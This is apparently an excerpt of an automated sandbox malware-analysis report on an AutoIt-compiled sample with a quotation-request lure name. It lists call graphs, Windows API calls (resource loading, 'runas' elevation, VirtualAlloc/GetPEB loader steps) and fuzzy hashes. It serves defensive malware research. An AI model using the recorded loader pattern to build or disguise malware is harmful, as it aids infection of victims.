97667->97672 97670 f2fe0b 22 API calls 97668->97670 97669 f2fddb 22 API calls 97671 f1363b 97669->97671 97670->97672 97671->97636 97672->97669 97673->97630 97675 f2fe0b 22 API calls 97674->97675 97676 f796ae __fread_nolock 97675->97676 97676->97658 97676->97676 97678 f80b65 97677->97678 97679 f2fddb 22 API calls 97678->97679 97680 f80b7c 97679->97680 97681 f19cb3 22 API calls 97680->97681 97682 f80b87 97681->97682 97682->97658 97684 f1400a 97683->97684 97686 f140ae 97683->97686 97685 f2fe0b 22 API calls 97684->97685 97687 f1403c 97684->97687 97685->97687 97686->97658 97687->97686 97688 f2fddb 22 API calls 97687->97688 97688->97687 97689->97654 97690->97655 97691->97658 97692->97660 97693 f1dee5 97696 f1b710 97693->97696 97697 f1b72b 97696->97697 97698 f60146 97697->97698 97699 f600f8 97697->97699 97725 f1b750 97697->97725 97738 f958a2 207 API calls 2 library calls 97698->97738 97702 f60102 97699->97702 97705 f6010f 97699->97705 97699->97725 97736 f95d33 207 API calls 97702->97736 97721 f1ba20 97705->97721 97737 f961d0 207 API calls 2 library calls 97705->97737 97708 f1bbe0 40 API calls 97708->97725 97709 f603d9 97709->97709 97712 f1ba4e 97714 f60322 97741 f95c0c 82 API calls 97714->97741 97721->97712 97742 f8359c 82 API calls __wsopen_s 97721->97742 97722 f1ec40 207 API calls 97722->97725 97723 f2d336 40 API calls 97723->97725 97724 f1a8c7 22 API calls 97724->97725 97725->97708 97725->97712 97725->97714 97725->97721 97725->97722 97725->97723 97725->97724 97727 f1a81b 41 API calls 97725->97727 97728 f2d2f0 40 API calls 97725->97728 97729 f2a01b 207 API calls 97725->97729 97730 f30242 5 API calls __Init_thread_wait 97725->97730 97731 f2edcd 22 API calls 97725->97731 97732 f300a3 29 API calls __onexit 97725->97732 97733 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97725->97733 97734 f2ee53 82 API calls 97725->97734 97735 f2e5ca 207 API calls 97725->97735 97739 f1aceb 23 API calls messages 97725->97739 97740 f6f6bf 23 API calls 97725->97740 
97727->97725 97728->97725 97729->97725 97730->97725 97731->97725 97732->97725 97733->97725 97734->97725 97735->97725 97736->97705 97737->97721 97738->97725 97739->97725 97740->97725 97741->97721 97742->97709 97743 f11044 97748 f110f3 97743->97748 97745 f1104a 97784 f300a3 29 API calls __onexit 97745->97784 97747 f11054 97785 f11398 97748->97785 97752 f1116a 97753 f1a961 22 API calls 97752->97753 97754 f11174 97753->97754 97755 f1a961 22 API calls 97754->97755 97756 f1117e 97755->97756 97757 f1a961 22 API calls 97756->97757 97758 f11188 97757->97758 97759 f1a961 22 API calls 97758->97759 97760 f111c6 97759->97760 97761 f1a961 22 API calls 97760->97761 97762 f11292 97761->97762 97795 f1171c 97762->97795 97766 f112c4 97767 f1a961 22 API calls 97766->97767 97768 f112ce 97767->97768 97769 f21940 9 API calls 97768->97769 97770 f112f9 97769->97770 97816 f11aab 97770->97816 97772 f11315 97773 f11325 GetStdHandle 97772->97773 97774 f52485 97773->97774 97775 f1137a 97773->97775 97774->97775 97776 f5248e 97774->97776 97778 f11387 OleInitialize 97775->97778 97777 f2fddb 22 API calls 97776->97777 97779 f52495 97777->97779 97778->97745 97823 f8011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97779->97823 97781 f5249e 97824 f80944 CreateThread 97781->97824 97783 f524aa CloseHandle 97783->97775 97784->97747 97825 f113f1 97785->97825 97788 f113f1 22 API calls 97789 f113d0 97788->97789 97790 f1a961 22 API calls 97789->97790 97791 f113dc 97790->97791 97792 f16b57 22 API calls 97791->97792 97793 f11129 97792->97793 97794 f11bc3 6 API calls 97793->97794 97794->97752 97796 f1a961 22 API calls 97795->97796 97797 f1172c 97796->97797 97798 f1a961 22 API calls 97797->97798 97799 f11734 97798->97799 97800 f1a961 22 API calls 97799->97800 97801 f1174f 97800->97801 97802 f2fddb 22 API calls 97801->97802 97803 f1129c 97802->97803 97804 f11b4a 97803->97804 97805 f11b58 97804->97805 97806 f1a961 22 API calls 97805->97806 97807 
f11b63 97806->97807 97808 f1a961 22 API calls 97807->97808 97809 f11b6e 97808->97809 97810 f1a961 22 API calls 97809->97810 97811 f11b79 97810->97811 97812 f1a961 22 API calls 97811->97812 97813 f11b84 97812->97813 97814 f2fddb 22 API calls 97813->97814 97815 f11b96 RegisterWindowMessageW 97814->97815 97815->97766 97817 f5272d 97816->97817 97818 f11abb 97816->97818 97832 f83209 23 API calls 97817->97832 97819 f2fddb 22 API calls 97818->97819 97821 f11ac3 97819->97821 97821->97772 97822 f52738 97823->97781 97824->97783 97833 f8092a 28 API calls 97824->97833 97826 f1a961 22 API calls 97825->97826 97827 f113fc 97826->97827 97828 f1a961 22 API calls 97827->97828 97829 f11404 97828->97829 97830 f1a961 22 API calls 97829->97830 97831 f113c6 97830->97831 97831->97788 97832->97822 97834 f62a00 97835 f1d7b0 messages 97834->97835 97836 f1db11 PeekMessageW 97835->97836 97837 f1d807 GetInputState 97835->97837 97838 f1d9d5 97835->97838 97840 f61cbe TranslateAcceleratorW 97835->97840 97841 f1db8f PeekMessageW 97835->97841 97842 f1da04 timeGetTime 97835->97842 97843 f1db73 TranslateMessage DispatchMessageW 97835->97843 97844 f1dbaf Sleep 97835->97844 97845 f62b74 Sleep 97835->97845 97847 f61dda timeGetTime 97835->97847 97861 f1ec40 207 API calls 97835->97861 97862 f21310 207 API calls 97835->97862 97866 f1dd50 97835->97866 97873 f1dfd0 97835->97873 97896 f1bf40 207 API calls 2 library calls 97835->97896 97897 f2edf6 IsDialogMessageW GetClassLongW 97835->97897 97899 f83a2a 23 API calls 97835->97899 97900 f8359c 82 API calls __wsopen_s 97835->97900 97836->97835 97837->97835 97837->97836 97840->97835 97841->97835 97842->97835 97843->97841 97864 f1dbc0 97844->97864 97845->97864 97846 f2e551 timeGetTime 97846->97864 97898 f2e300 23 API calls 97847->97898 97850 f62c0b GetExitCodeProcess 97851 f62c37 CloseHandle 97850->97851 97852 f62c21 WaitForSingleObject 97850->97852 97851->97864 97852->97835 97852->97851 97853 f62a31 97853->97838 97854 fa29bf GetForegroundWindow 97854->97864 97856 
f62ca9 Sleep 97856->97835 97861->97835 97862->97835 97864->97835 97864->97838 97864->97846 97864->97850 97864->97853 97864->97854 97864->97856 97901 f95658 23 API calls 97864->97901 97902 f7e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97864->97902 97903 f7d4dc 47 API calls 97864->97903 97867 f1dd83 97866->97867 97868 f1dd6f 97866->97868 97905 f8359c 82 API calls __wsopen_s 97867->97905 97904 f1d260 207 API calls 2 library calls 97868->97904 97870 f1dd7a 97870->97835 97872 f62f75 97872->97872 97874 f1e010 97873->97874 97892 f1e0dc messages 97874->97892 97908 f30242 5 API calls __Init_thread_wait 97874->97908 97877 f62fca 97879 f1a961 22 API calls 97877->97879 97877->97892 97878 f1a961 22 API calls 97878->97892 97880 f62fe4 97879->97880 97909 f300a3 29 API calls __onexit 97880->97909 97884 f62fee 97910 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97884->97910 97887 f1ec40 207 API calls 97887->97892 97888 f8359c 82 API calls 97888->97892 97890 f1a8c7 22 API calls 97890->97892 97891 f204f0 22 API calls 97891->97892 97892->97878 97892->97887 97892->97888 97892->97890 97892->97891 97893 f1e3e1 97892->97893 97906 f1a81b 41 API calls 97892->97906 97907 f2a308 207 API calls 97892->97907 97911 f30242 5 API calls __Init_thread_wait 97892->97911 97912 f300a3 29 API calls __onexit 97892->97912 97913 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97892->97913 97914 f947d4 207 API calls 97892->97914 97915 f968c1 207 API calls 97892->97915 97893->97835 97896->97835 97897->97835 97898->97835 97899->97835 97900->97835 97901->97864 97902->97864 97903->97864 97904->97870 97905->97872 97906->97892 97907->97892 97908->97877 97909->97884 97910->97892 97911->97892 97912->97892 97913->97892 97914->97892 97915->97892 97916 f48402 97921 f481be 97916->97921 97919 f4842a 97926 f481ef try_get_first_available_module 97921->97926 97923 f483ee 97940 f427ec 26 API calls __wsopen_s 97923->97940 97925 f48343 
[Continuation of the preceding call-graph edge list (graph image not reproduced); the nodes visible in it cover the CRT file-open path (CallCatchBlock, __wsopen_s, CreateFileW, GetFileType, GetLastError, __dosmaperr, CloseHandle, _abort, EnterCriticalSection/LeaveCriticalSection), a second region at 15ff108 (CreateFileW, VirtualAlloc, ReadFile, GetPEB, Sleep) and a node f11cad calling SystemParametersInfoW]

Control-flow Graph

control_flow_graph 234 (function 00F142DE; graph image not reproduced, its edge list shows calls to f1a961, GetVersionExW, f16b57, f193b2, f137a0, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary and GetSystemInfo)
APIs
• GetVersionExW.KERNEL32(?), ref: 00F1430D
  • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
• GetCurrentProcess.KERNEL32(?,00FACB64,00000000,?,?), ref: 00F14422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00F14429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F14454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F14466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00F14474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00F1447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 00F144A0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: b45b968ed44afe1f05002fefd3b2417dc22b3b71b28490602c96512c7a8dfaf3
• Instruction ID: 51194602facef63a8965b1a133724d907a3b7dd2fc2b2ce9e28b598ab67fc5c6
• Opcode Fuzzy Hash: b45b968ed44afe1f05002fefd3b2417dc22b3b71b28490602c96512c7a8dfaf3
• Instruction Fuzzy Hash: 1DA1A376D0A2CCCFC711CBAF7CC06D97FA47B66751B184899D8819BA22D2305948FB72

Control-flow Graph

control_flow_graph 529 (function 00F142A2; graph image not reproduced, its edge list shows calls to CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource)
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F150AA,?,?,00000000,00000000), ref: 00F142B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F150AA,?,?,00000000,00000000), ref: 00F142C9
• LoadResource.KERNEL32(?,00000000,?,?,00F150AA,?,?,00000000,00000000,?,?,?,?,?,?,00F14F20), ref: 00F535BE
• SizeofResource.KERNEL32(?,00000000,?,?,00F150AA,?,?,00000000,00000000,?,?,?,?,?,?,00F14F20), ref: 00F535D3
• LockResource.KERNEL32(00F150AA,?,?,00F150AA,?,?,00000000,00000000,?,?,?,?,?,?,00F14F20,?), ref: 00F535E6
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: fc3e8caa0ba3bb2016c0943d4b805790c6eaf1d4bd68380417fb98b2627d0343
• Instruction ID: 55108f33f8696cdf5bef9ccb9002af7ab4335e8ad1987d307619fe4832273368
• Opcode Fuzzy Hash: fc3e8caa0ba3bb2016c0943d4b805790c6eaf1d4bd68380417fb98b2627d0343
• Instruction Fuzzy Hash: 35118EB1600705BFD7218B65DC48F677BBAEBC6B51F144169F402D6290DB71EC40A670

Control-flow Graph

(graph image not reproduced)
APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00F12B6B
  • Part of subcall function 00F13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FE1418,?,00F12E7F,?,?,?,00000000), ref: 00F13A78
  • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00FD2224), ref: 00F52C10
• ShellExecuteW.SHELL32(00000000,?,?,00FD2224), ref: 00F52C17
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: bafd94b8747a47d83843e1055c4a11b2d4143c4a7d255c021c19ed7e4783ba54
• Instruction ID: 4526e7ddff3981e8f505b1054f47390f9dac1f28d704779a06767caad0942dff
• Opcode Fuzzy Hash: bafd94b8747a47d83843e1055c4a11b2d4143c4a7d255c021c19ed7e4783ba54
• Instruction Fuzzy Hash: 2911D2316083456AC704FF61DC519EE77A5ABD2320F44042EB182021A3CF388A89B792
APIs
• GetInputState.USER32 ref: 00F1D807
• timeGetTime.WINMM ref: 00F1DA07
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1DB28
• TranslateMessage.USER32(?), ref: 00F1DB7B
• DispatchMessageW.USER32(?), ref: 00F1DB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1DB9F
• Sleep.KERNEL32(0000000A), ref: 00F1DBB1
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
• String ID:
• API String ID: 2189390790-0
• Opcode ID: c90490efd21c24dde66b5628a0e7a5718fb738c36c6fd0eb3028414664fcc61f
• Instruction ID: d85022a5f0556fc360c59c29fa677eb79349a246dd6b6011493b58027e717df8
• Opcode Fuzzy Hash: c90490efd21c24dde66b5628a0e7a5718fb738c36c6fd0eb3028414664fcc61f
• Instruction Fuzzy Hash: 2E42F371A08745DFD728CF24C884BAAB7F4BF86324F54461DE4568B291D778E884FB82

Control-flow Graph

(graph image not reproduced)
APIs
• GetSysColorBrush.USER32(0000000F), ref: 00F12D07
• RegisterClassExW.USER32(00000030), ref: 00F12D31
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F12D42
• InitCommonControlsEx.COMCTL32(?), ref: 00F12D5F
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F12D6F
• LoadIconW.USER32(000000A9), ref: 00F12D85
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F12D94
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 1585319b0ed6bcd605fdfb697eeeb635f7a8fa625b3a50fd664d22ea9878c0f1
• Instruction ID: c74e6594abcf0b4346f7fe5cb5e37f6e87bf728f36c7e7559c50c4f7054fc0d6
• Opcode Fuzzy Hash: 1585319b0ed6bcd605fdfb697eeeb635f7a8fa625b3a50fd664d22ea9878c0f1
• Instruction Fuzzy Hash: BE21C0B591125CAFDB00DFA5E889BEDBBB4FB09700F00811AF511AA2A0D7B55544EFA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 302 f5065b-f5068b call f5042f 305 f506a6-f506b2 call f45221 302->305 306 f5068d-f50698 call f3f2c6 302->306 311 f506b4-f506c9 call f3f2c6 call f3f2d9 305->311 312 f506cb-f50714 call f5039a 305->312 313 f5069a-f506a1 call f3f2d9 306->313 311->313 321 f50716-f5071f 312->321 322 f50781-f5078a GetFileType 312->322 323 f5097d-f50983 313->323 327 f50756-f5077c GetLastError call f3f2a3 321->327 328 f50721-f50725 321->328 324 f507d3-f507d6 322->324 325 f5078c-f507bd GetLastError call f3f2a3 CloseHandle 322->325 330 f507df-f507e5 324->330 331 f507d8-f507dd 324->331 325->313 339 f507c3-f507ce call f3f2d9 325->339 327->313 328->327 332 f50727-f50754 call f5039a 328->332 336 f507e9-f50837 call f4516a 330->336 337 f507e7 330->337 331->336 332->322 332->327 345 f50847-f5086b call f5014d 336->345 346 f50839-f50845 call f505ab 336->346 337->336 339->313 352 f5086d 345->352 353 f5087e-f508c1 345->353 346->345 351 f5086f-f50879 call f486ae 346->351 351->323 352->351 355 f508c3-f508c7 353->355 356 f508e2-f508f0 353->356 355->356 358 f508c9-f508dd 355->358 359 f508f6-f508fa 356->359 360 f5097b 356->360 358->356 359->360 361 f508fc-f5092f CloseHandle call f5039a 359->361 360->323 364 f50931-f5095d GetLastError call f3f2a3 call f45333 361->364 365 f50963-f50977 361->365 364->365 365->360
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F5039A: CreateFileW.KERNELBASE(00000000,00000000,?,00F50704,?,?,00000000,?,00F50704,00000000,0000000C), ref: 00F503B7
                                                                                                                    • GetLastError.KERNEL32 ref: 00F5076F
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F50776
                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00F50782
                                                                                                                    • GetLastError.KERNEL32 ref: 00F5078C
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F50795
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F507B5
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00F508FF
                                                                                                                    • GetLastError.KERNEL32 ref: 00F50931
                                                                                                                    • __dosmaperr.LIBCMT ref: 00F50938
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                    • Opcode ID: d511e2fe65402bc191fc0b4d97c93ca4a4cfdf16ee2dda939366c50059d87c02
                                                                                                                    • Instruction ID: dba7ddd01e981a15924fcf054e8a03e996bff51637816122926a387ffe51bcfc
                                                                                                                    • Opcode Fuzzy Hash: d511e2fe65402bc191fc0b4d97c93ca4a4cfdf16ee2dda939366c50059d87c02
                                                                                                                    • Instruction Fuzzy Hash: 65A11532E001488FDF19AF68DC91BAE3BA0EB46321F140159FD159F392DF35991AEB91

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F13A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FE1418,?,00F12E7F,?,?,?,00000000), ref: 00F13A78
                                                                                                                      • Part of subcall function 00F13357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F13379
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F1356A
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F5318D
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F531CE
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F53210
                                                                                                                    • _wcslen.LIBCMT ref: 00F53277
                                                                                                                    • _wcslen.LIBCMT ref: 00F53286
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                    • Opcode ID: 395d083aa15110e54c6cb6026334d02622be80f47af386ca1841d3dcaa50d9fd
                                                                                                                    • Instruction ID: b83c8b2c42a7ba7f3ef5034bc958b3db98dcfce79656ddea4240d5e6487666ff
                                                                                                                    • Opcode Fuzzy Hash: 395d083aa15110e54c6cb6026334d02622be80f47af386ca1841d3dcaa50d9fd
                                                                                                                    • Instruction Fuzzy Hash: CA71A1B14043499EC314DF69DC829ABBBECFF85750F40042EF54597161EB789A88EFA2

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F12B8E
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F12B9D
                                                                                                                    • LoadIconW.USER32(00000063), ref: 00F12BB3
                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00F12BC5
                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00F12BD7
                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F12BEF
                                                                                                                    • RegisterClassExW.USER32(?), ref: 00F12C40
                                                                                                                      • Part of subcall function 00F12CD4: GetSysColorBrush.USER32(0000000F), ref: 00F12D07
                                                                                                                      • Part of subcall function 00F12CD4: RegisterClassExW.USER32(00000030), ref: 00F12D31
                                                                                                                      • Part of subcall function 00F12CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F12D42
                                                                                                                      • Part of subcall function 00F12CD4: InitCommonControlsEx.COMCTL32(?), ref: 00F12D5F
                                                                                                                      • Part of subcall function 00F12CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F12D6F
                                                                                                                      • Part of subcall function 00F12CD4: LoadIconW.USER32(000000A9), ref: 00F12D85
                                                                                                                      • Part of subcall function 00F12CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F12D94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                    • Opcode ID: 6a9b33e408fed3043f8bcdeb19de5974f8e908b5af22a2c5dba4f55c41fc50c9
                                                                                                                    • Instruction ID: 2af520d5c4423c9b0c3a1c5b64128af7c1ebdb4f27316455ade0a86dd0dc5d11
                                                                                                                    • Opcode Fuzzy Hash: 6a9b33e408fed3043f8bcdeb19de5974f8e908b5af22a2c5dba4f55c41fc50c9
                                                                                                                    • Instruction Fuzzy Hash: E7212CB4E0035CAFDB109FA6EC95AAE7FB4FB48B50F04001AF600AA7A0D7B11540EF90

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F1316A,?,?), ref: 00F131D8
                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00F1316A,?,?), ref: 00F13204
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F13227
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F1316A,?,?), ref: 00F13232
                                                                                                                    • CreatePopupMenu.USER32 ref: 00F13246
                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00F13267
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
